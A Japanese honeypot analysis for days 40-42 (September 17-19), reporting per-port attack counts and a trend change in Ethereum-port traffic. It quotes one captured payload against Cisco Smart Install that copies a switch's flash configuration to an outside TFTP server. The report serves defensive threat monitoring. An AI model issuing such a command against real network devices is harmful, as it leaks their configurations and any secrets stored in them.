ハニーポット簡易分析(40-42日目:9/17-9/19)
9/17-9/19 のHonetyrapにおける簡易分析となります。
9/17までは Ethereumに関する通信が多かったですが、9/18には数が激減しました。
それ以降は特に通信の傾向変化はありませんでした。
◾️4786に関する通信について
検知数は多くないですが、Cisco Smart Install Client が使用する 4786/tcp ポートに対する攻撃を観測していました。TFTPサーバからコンフィグを読み込んで、設定するような通信と思われます。ただし、xxxの部分はこのサーバのIPであり、IPからの通信があるかの調査行為かもしれません。
<ペイロード>
copy flash:/config.text tftp://222[.]211[.]78[.]73/xxx.xx.xxx.xxx.conf
◾️宛先ポートごとの検知数(80ポートを除く)
9/17 6561件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 1,811 | 27.60% | Ethereum |
445 | 1,769 | 26.96% | SMB |
22 | 360 | 5.49% | SSH |
52869 | 78 | 1.19% | D-Link, Realtek SDK |
1433 | 70 | 1.07% | Microsoft SQL Server |
22022 | 64 | 0.98% | ? |
6379 | 54 | 0.82% | Redis |
3389 | 49 | 0.75% | RDP |
81 | 38 | 0.58% | GoAhead Web Server |
5555 | 36 | 0.55% | Android Debug Bridge |
9/18 4746件 | |||
宛先ポート | 件数 | 割合 | サービス |
445 | 1,824 | 38.43% | SMB |
22 | 671 | 14.14% | SSH |
3389 | 229 | 4.83% | RDP |
1433 | 74 | 1.56% | Microsoft SQL Server |
8080 | 73 | 1.54% | Proxy |
52869 | 46 | 0.97% | D-Link, Realtek SDK |
81 | 43 | 0.91% | GoAhead Web Server |
636 | 34 | 0.72% | LDAPS |
6379 | 34 | 0.72% | Redis |
7657 | 33 | 0.70% | ? |
9/19 3089件 | |||
宛先ポート | 件数 | 割合 | サービス |
445 | 1,540 | 49.85% | SMB |
3389 | 124 | 4.01% | RDP |
81 | 68 | 2.20% | GoAhead Web Server |
22022 | 64 | 2.07% | ? |
1433 | 50 | 1.62% | Microsoft SQL Server |
52869 | 47 | 1.52% | D-Link, Realtek SDK |
8080 | 46 | 1.49% | Proxy |
6379 | 38 | 1.23% | Redis |
6666 | 36 | 1.17% | IRC |
137 | 32 | 1.04% | NetBIOS Name Service |
◾️マルウェアダウンロード
こちらは特に傾向の変化はありませんでした。
以上、簡易分析となります。